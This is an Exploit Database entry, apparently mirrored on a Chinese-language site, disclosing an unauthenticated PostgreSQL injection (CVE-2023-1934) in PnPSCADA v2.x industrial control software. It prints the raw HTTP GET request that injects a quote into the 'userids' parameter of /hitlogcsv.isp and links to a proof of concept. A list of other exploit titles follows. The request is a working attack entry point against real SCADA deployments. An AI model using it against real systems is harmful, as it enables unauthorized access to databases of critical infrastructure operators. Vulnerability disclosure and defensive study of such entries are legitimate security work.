PnPSCADA v2.x – Unauthenticated PostgreSQL Injection

Exploit Database
17 阅读

作者： Momen Eldawakhly

日期： 2023-05-23
类别：
- webapps
平台：
- hardware
来源：https://www.exploit-db.com/exploits/51448/

# Exploit Title: PnPSCADA v2.x - Unauthenticated PostgreSQL Injection
# Date: 15/5/2023
# Exploit Author: Momen Eldawakhly (Cyber Guy) at Samurai Digital Security Ltd
# Vendor Homepage: https://pnpscada.com/
# Version: PnPSCADA (cross platforms): v2.x
# Tested on: Unix
# CVE : CVE-2023-1934
# Proof-of-Concept: https://drive.google.com/drive/u/0/folders/1r_HMoaU3P0t-04gMM90M0hfdBRi_P0_8

SQLi crashing point:

GET /hitlogcsv.isp?userids=1337'&startdate=
2022-12-138200083A0093A00&enddate=2022-12-138201383A1783A00
HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US)
AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0
Safari/534.14
Host: vulnerablepnpscada.int
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

last Exploits
PnPSCADA v2.x – Unauthenticated PostgreSQL Injection的更多信息

Sophos Web Appliance 4.3.10.4 – Pre-auth command injection：
eXV2 CMS – Multiple Cross-Site Scripting Vulnerabilities：
ManageEngine Applications Manager – Multiple Cross-Site Scripting / SQL Injections：
Nagios XI 5.7.3 – ‘Manage Users’ Authenticated SQL Injection：
openEngine 2.0 – Multiple Blind SQL Injection Vulnerabilities：
WordPress Plugin image Gallery with Slideshow 1.5 – Multiple Vulnerabilities：
Hotel And Lodge Management System 1.0 – ‘Customer Details’ Stored XSS：
Easy-Clanpage 2.01 – SQL Injection：